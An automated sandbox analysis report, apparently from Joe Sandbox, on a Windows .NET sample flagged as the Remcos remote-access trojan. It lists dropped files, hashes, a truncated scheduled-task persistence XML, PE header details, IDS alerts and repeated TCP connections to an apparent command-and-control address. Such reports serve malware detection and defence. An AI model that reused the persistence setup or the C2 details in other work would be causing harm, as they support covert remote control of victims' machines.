                        Category:dropped
                        Size (bytes):1396
                        Entropy (8bit):5.337066511654157
                        Encrypted:false
                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhgLE4qXKIE4oKNzKoZAE4Kze0E4qE4x84j:MIHK5HKH1qHiYHKh3ogLHitHo6hAHKze
                        MD5:55A2AF8F9FCA3AE99FBA235D3E16A53F
                        SHA1:32F34219599006657BFF0B868257916A0C393AAA
                        SHA-256:2E0B5859D8501D26669B982BD18005B625352435DB8E1D8B944EED350C1DB0B3
                        SHA-512:F6EB6E6AA729963FF23349B6DF3B558896C7B294BF15F6601C4FEF2B1034DEBE207CE04A85F14124CBC41B168157778A23BAA06FCCFE13B0EE262CF2D80FDDA6
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c5619

                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vQyKfYxzXB.exe.log

                        Download File
                        Process:C:\Users\user\Desktop\vQyKfYxzXB.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1396
                        Entropy (8bit):5.337066511654157
                        Encrypted:false
                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhgLE4qXKIE4oKNzKoZAE4Kze0E4qE4x84j:MIHK5HKH1qHiYHKh3ogLHitHo6hAHKze
                        MD5:55A2AF8F9FCA3AE99FBA235D3E16A53F
                        SHA1:32F34219599006657BFF0B868257916A0C393AAA
                        SHA-256:2E0B5859D8501D26669B982BD18005B625352435DB8E1D8B944EED350C1DB0B3
                        SHA-512:F6EB6E6AA729963FF23349B6DF3B558896C7B294BF15F6601C4FEF2B1034DEBE207CE04A85F14124CBC41B168157778A23BAA06FCCFE13B0EE262CF2D80FDDA6
                        Malicious:true
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c5619

                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2232
                        Entropy (8bit):5.380747059108785
                        Encrypted:false
                        SSDEEP:48:lylWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugeC/ZPUyus:lGLHxvIIwLgZ2KRHWLOug8s
                        MD5:4D3B8C97355CF67072ABECB12613F72B
                        SHA1:07B27BA4FE575BBF9F893F03789AD9B8BC2F8615
                        SHA-256:75FC38CDE708951C1963BB89E8AA6CC82F15F1A261BEACAF1BFD9CF0518BEECD
                        SHA-512:8E47C93144772042865B784300F4528E079615F502A3C5DC6BFDE069880268706B7B3BEE227AD5D9EA0E6A3055EDBC90B39B9E55FE3AD58635493253A210C996
                        Malicious:false
                        Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i5yvdzd4.efs.ps1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lzmlnf25.d1r.psm1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_udurmeay.324.psm1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v1vgqdbu.oqu.ps1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\tmp8902.tmp

                        Download File
                        Process:C:\Users\user\Desktop\vQyKfYxzXB.exe
                        File Type:XML 1.0 document, ASCII text
                        Category:dropped
                        Size (bytes):1602
                        Entropy (8bit):5.119762820069892
                        Encrypted:false
                        SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtJxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuT/v
                        MD5:9E20CB83F90F09C6AF491FC728E4B0A8
                        SHA1:F93A20F9EDEDD4D78A01A7BCB244E42BED7A4A00
                        SHA-256:C4053065421461B1D007028768F722BDFD4E7D2908AEAAC2AAB3D597EBD8431D
                        SHA-512:42E85EFD975E1C5DD489A5E41A94D76DBDD42AF4C2849171434290309D26DF48A33C03C7258DE30780E87718B7859AD733C62D1261F26D434A8C4CF03FD71031
                        Malicious:true
                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

                        C:\Users\user\AppData\Local\Temp\tmp9C1D.tmp

                        Download File
                        Process:C:\Users\user\AppData\Roaming\RTdozXra.exe
                        File Type:XML 1.0 document, ASCII text
                        Category:dropped
                        Size (bytes):1602
                        Entropy (8bit):5.119762820069892
                        Encrypted:false
                        SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtJxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuT/v
                        MD5:9E20CB83F90F09C6AF491FC728E4B0A8
                        SHA1:F93A20F9EDEDD4D78A01A7BCB244E42BED7A4A00
                        SHA-256:C4053065421461B1D007028768F722BDFD4E7D2908AEAAC2AAB3D597EBD8431D
                        SHA-512:42E85EFD975E1C5DD489A5E41A94D76DBDD42AF4C2849171434290309D26DF48A33C03C7258DE30780E87718B7859AD733C62D1261F26D434A8C4CF03FD71031
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

                        C:\Users\user\AppData\Roaming\RTdozXra.exe

                        Download File
                        Process:C:\Users\user\Desktop\vQyKfYxzXB.exe
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):1010176
                        Entropy (8bit):7.795583452160133
                        Encrypted:false
                        SSDEEP:24576:lG5oJaVtxpPhSo88M8taYVTwLknbBdrvmyzdKl83AXax:SvMAaYVTbnbfrv1z8lR
                        MD5:A5E057F72B814DDCC71246B8DD092E2A
                        SHA1:155810FADDF2F068FE49735BBD6A3A13A60C75C3
                        SHA-256:0D0CC505A458E4983DA79246C321DFDA6EDC4D9B1F14E902AC13788A27C53AFA
                        SHA-512:3CB1FCDAB4B1D13FFDDE1CF5439FC69830DB3FCB9F444CBEA4A7167F88414CA630D09BA00742EE5D5A4B2F1C9F33EF13351781E447D34D5DB0AAD2F132D68CA9
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 71%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....8...............0..`...........}... ........@.. ....................................@.................................z}..O....................................K..p............................................ ............... ..H............text...T^... ...`.................. ..`.rsrc................b..............@..@.reloc...............h..............@..B.................}......H.......d...`.......(....X...............................................0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|......(...+...3.*V....{....s....o.....*Z..{....%-.&+...o.....*...0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|......(...+...3.*V....{....s....o.....*Z..{....%-.&+...o.....*...0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|....

                        C:\Users\user\AppData\Roaming\RTdozXra.exe:Zone.Identifier

                        Download File
                        Process:C:\Users\user\Desktop\vQyKfYxzXB.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):26
                        Entropy (8bit):3.95006375643621
                        Encrypted:false
                        SSDEEP:3:ggPYV:rPYV
                        MD5:187F488E27DB4AF347237FE461A079AD
                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                        Malicious:true
                        Preview:[ZoneTransfer]....ZoneId=0

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Entropy (8bit):7.795583452160133
                        TrID:
                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                        • Win32 Executable (generic) a (10002005/4) 49.75%
                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                        • Windows Screen Saver (13104/52) 0.07%
                        • Generic Win/DOS Executable (2004/3) 0.01%
                        File name:vQyKfYxzXB.exe
                        File size:1'010'176 bytes
                        MD5:a5e057f72b814ddcc71246b8dd092e2a
                        SHA1:155810faddf2f068fe49735bbd6a3a13a60c75c3
                        SHA256:0d0cc505a458e4983da79246c321dfda6edc4d9b1f14e902ac13788a27c53afa
                        SHA512:3cb1fcdab4b1d13ffdde1cf5439fc69830db3fcb9f444cbea4a7167f88414ca630d09ba00742ee5d5a4b2f1c9f33ef13351781e447d34d5db0aad2f132d68ca9
                        SSDEEP:24576:lG5oJaVtxpPhSo88M8taYVTwLknbBdrvmyzdKl83AXax:SvMAaYVTbnbfrv1z8lR
                        TLSH:58250160264DE603D97A4BF90471F278177AAECA7C01D2068FD97CEB7936F950D086A3
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....8...............0..`...........}... ........@.. ....................................@................................

                        File Icon

                        Icon Hash:00928e8e8686b000

                        Static PE Info

                        General

                        Entrypoint:0x4f7dce
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Time Stamp:0xAF38D2CF [Mon Feb 26 17:33:03 2063 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                        Entrypoint Preview

                        Instruction
                        jmp dword ptr [00402000h]
                        add dword ptr [eax], eax
                        add byte ptr [eax], al
                        add al, byte ptr [eax]
                        add byte ptr [eax], al
                        add al, 00h
                        add byte ptr [eax], al
                        or byte ptr [eax], al
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        and byte ptr [eax], al
                        add byte ptr [eax], al
                        inc eax
                        add byte ptr [eax], al
                        add byte ptr [eax+00000000h], al
                        add dword ptr [eax], eax
                        add byte ptr [eax], al
                        add al, byte ptr [eax]
                        add byte ptr [eax], al
                        add al, 00h
                        add byte ptr [eax], al
                        or byte ptr [eax], al
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        and byte ptr [eax], al
                        add byte ptr [eax], al
                        inc eax
                        add byte ptr [eax], al
                        add byte ptr [eax+00530000h], al
                        jns 00007F69C8FA68E2h
                        jnc 00007F69C8FA68E2h
                        je 00007F69C8FA68E2h
                        add byte ptr [ebp+00h], ch
                        add byte ptr [edx+00h], dl
                        add byte ptr [esi+00h], ah
                        insb
                        add byte ptr [ebp+00h], ah
                        arpl word ptr [eax], ax
                        je 00007F69C8FA68E2h
                        imul eax, dword ptr [eax], 006E006Fh
                        add byte ptr [ecx+00h], al
                        jnc 00007F69C8FA68E2h
                        jnc 00007F69C8FA68E2h
                        add byte ptr [ebp+00h], ch
                        bound eax, dword ptr [eax]
                        insb
                        add byte ptr [ecx+00h], bh
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        dec esp
                        add byte ptr [edi+00h], ch
                        popad
                        add byte ptr [eax+eax+00h], ah
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0xf7d7a0x4f.text
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xf80000x5ec.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xfa0000xc.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0xf4bb40x70.text
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x20000xf5e540xf6000c01ed7d3aea5706d55c21382168b090cFalse0.9105889545223578data7.800755325212195IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rsrc0xf80000x5ec0x600e06690897d295d8be3e2dfbeaf961bfaFalse0.4303385416666667data4.190798740992328IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0xfa0000xc0x200aadc915659d3ffee815b8961a4ae2425False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_VERSION0xf80900x35cdata0.4197674418604651
                        RT_MANIFEST0xf83fc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                        Imports

                        DLLImport
                        mscoree.dll_CorExeMain

                        Network Behavior

                        Suricata IDS Alerts

                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2025-01-10T17:30:30.199994+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.74970269.174.98.4845682TCP
                        2025-01-10T17:30:52.640096+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.74982069.174.98.4845682TCP
                        2025-01-10T17:31:15.030732+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.74995569.174.98.4845682TCP
                        2025-01-10T17:31:37.422868+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.74997869.174.98.4845682TCP
                        2025-01-10T17:31:59.830523+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.74997969.174.98.4845682TCP
                        2025-01-10T17:32:22.205879+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.74998069.174.98.4845682TCP
                        2025-01-10T17:32:44.862851+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.74998169.174.98.4845682TCP
                        2025-01-10T17:33:07.360992+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.74998269.174.98.4845682TCP
                        2025-01-10T17:33:29.740356+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.74998369.174.98.4845682TCP
                        2025-01-10T17:33:52.157024+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.74998469.174.98.4845682TCP
                        2025-01-10T17:34:14.597081+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.74998569.174.98.4845682TCP

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Jan 10, 2025 17:30:08.813821077 CET4970245682192.168.2.769.174.98.48
                        Jan 10, 2025 17:30:08.818787098 CET456824970269.174.98.48192.168.2.7
                        Jan 10, 2025 17:30:08.818939924 CET4970245682192.168.2.769.174.98.48
                        Jan 10, 2025 17:30:08.825000048 CET4970245682192.168.2.769.174.98.48
                        Jan 10, 2025 17:30:08.829823971 CET456824970269.174.98.48192.168.2.7
                        Jan 10, 2025 17:30:30.199810028 CET456824970269.174.98.48192.168.2.7
                        Jan 10, 2025 17:30:30.199994087 CET4970245682192.168.2.769.174.98.48
                        Jan 10, 2025 17:30:30.200088978 CET4970245682192.168.2.769.174.98.48
                        Jan 10, 2025 17:30:30.204945087 CET456824970269.174.98.48192.168.2.7
                        Jan 10, 2025 17:30:31.216994047 CET4982045682192.168.2.769.174.98.48
                        Jan 10, 2025 17:30:31.221968889 CET456824982069.174.98.48192.168.2.7
                        Jan 10, 2025 17:30:31.222062111 CET4982045682192.168.2.769.174.98.48
                        Jan 10, 2025 17:30:31.228585958 CET4982045682192.168.2.769.174.98.48
                        Jan 10, 2025 17:30:31.233500957 CET456824982069.174.98.48192.168.2.7
                        Jan 10, 2025 17:30:52.639947891 CET456824982069.174.98.48192.168.2.7
                        Jan 10, 2025 17:30:52.640095949 CET4982045682192.168.2.769.174.98.48
                        Jan 10, 2025 17:30:52.640196085 CET4982045682192.168.2.769.174.98.48
                        Jan 10, 2025 17:30:52.644979000 CET456824982069.174.98.48192.168.2.7
                        Jan 10, 2025 17:30:53.652426004 CET4995545682192.168.2.769.174.98.48
                        Jan 10, 2025 17:30:53.657316923 CET456824995569.174.98.48192.168.2.7
                        Jan 10, 2025 17:30:53.657424927 CET4995545682192.168.2.769.174.98.48
                        Jan 10, 2025 17:30:53.674339056 CET4995545682192.168.2.769.174.98.48
                        Jan 10, 2025 17:30:53.679308891 CET456824995569.174.98.48192.168.2.7
                        Jan 10, 2025 17:31:15.030637026 CET456824995569.174.98.48192.168.2.7
                        Jan 10, 2025 17:31:15.030731916 CET4995545682192.168.2.769.174.98.48
                        Jan 10, 2025 17:31:15.030823946 CET4995545682192.168.2.769.174.98.48
                        Jan 10, 2025 17:31:15.035939932 CET456824995569.174.98.48192.168.2.7
                        Jan 10, 2025 17:31:16.041994095 CET4997845682192.168.2.769.174.98.48
                        Jan 10, 2025 17:31:16.046869993 CET456824997869.174.98.48192.168.2.7
                        Jan 10, 2025 17:31:16.047029018 CET4997845682192.168.2.769.174.98.48
                        Jan 10, 2025 17:31:16.056910992 CET4997845682192.168.2.769.174.98.48
                        Jan 10, 2025 17:31:16.061728954 CET456824997869.174.98.48192.168.2.7
                        Jan 10, 2025 17:31:37.420160055 CET456824997869.174.98.48192.168.2.7
                        Jan 10, 2025 17:31:37.422868013 CET4997845682192.168.2.769.174.98.48
                        Jan 10, 2025 17:31:37.422868967 CET4997845682192.168.2.769.174.98.48
                        Jan 10, 2025 17:31:37.427905083 CET456824997869.174.98.48192.168.2.7
                        Jan 10, 2025 17:31:38.432754040 CET4997945682192.168.2.769.174.98.48
                        Jan 10, 2025 17:31:38.437720060 CET456824997969.174.98.48192.168.2.7
                        Jan 10, 2025 17:31:38.437791109 CET4997945682192.168.2.769.174.98.48
                        Jan 10, 2025 17:31:38.442378998 CET4997945682192.168.2.769.174.98.48
                        Jan 10, 2025 17:31:38.447145939 CET456824997969.174.98.48192.168.2.7
                        Jan 10, 2025 17:31:59.830437899 CET456824997969.174.98.48192.168.2.7
                        Jan 10, 2025 17:31:59.830523014 CET4997945682192.168.2.769.174.98.48
                        Jan 10, 2025 17:31:59.830637932 CET4997945682192.168.2.769.174.98.48
                        Jan 10, 2025 17:31:59.835427999 CET456824997969.174.98.48192.168.2.7
                        Jan 10, 2025 17:32:00.838324070 CET4998045682192.168.2.769.174.98.48
                        Jan 10, 2025 17:32:00.843103886 CET456824998069.174.98.48192.168.2.7
                        Jan 10, 2025 17:32:00.843249083 CET4998045682192.168.2.769.174.98.48
                        Jan 10, 2025 17:32:00.846787930 CET4998045682192.168.2.769.174.98.48
                        Jan 10, 2025 17:32:00.851528883 CET456824998069.174.98.48192.168.2.7
                        Jan 10, 2025 17:32:22.205773115 CET456824998069.174.98.48192.168.2.7
                        Jan 10, 2025 17:32:22.205878973 CET4998045682192.168.2.769.174.98.48
                        Jan 10, 2025 17:32:22.205920935 CET4998045682192.168.2.769.174.98.48
                        Jan 10, 2025 17:32:22.210735083 CET456824998069.174.98.48192.168.2.7
                        Jan 10, 2025 17:32:23.459410906 CET4998145682192.168.2.769.174.98.48
                        Jan 10, 2025 17:32:23.464250088 CET456824998169.174.98.48192.168.2.7
                        Jan 10, 2025 17:32:23.464344978 CET4998145682192.168.2.769.174.98.48
                        Jan 10, 2025 17:32:23.467925072 CET4998145682192.168.2.769.174.98.48
                        Jan 10, 2025 17:32:23.472800970 CET456824998169.174.98.48192.168.2.7
                        Jan 10, 2025 17:32:44.862584114 CET456824998169.174.98.48192.168.2.7
                        Jan 10, 2025 17:32:44.862850904 CET4998145682192.168.2.769.174.98.48
                        Jan 10, 2025 17:32:44.862893105 CET4998145682192.168.2.769.174.98.48
                        Jan 10, 2025 17:32:44.867722034 CET456824998169.174.98.48192.168.2.7
                        Jan 10, 2025 17:32:45.958169937 CET4998245682192.168.2.769.174.98.48
                        Jan 10, 2025 17:32:45.963044882 CET456824998269.174.98.48192.168.2.7
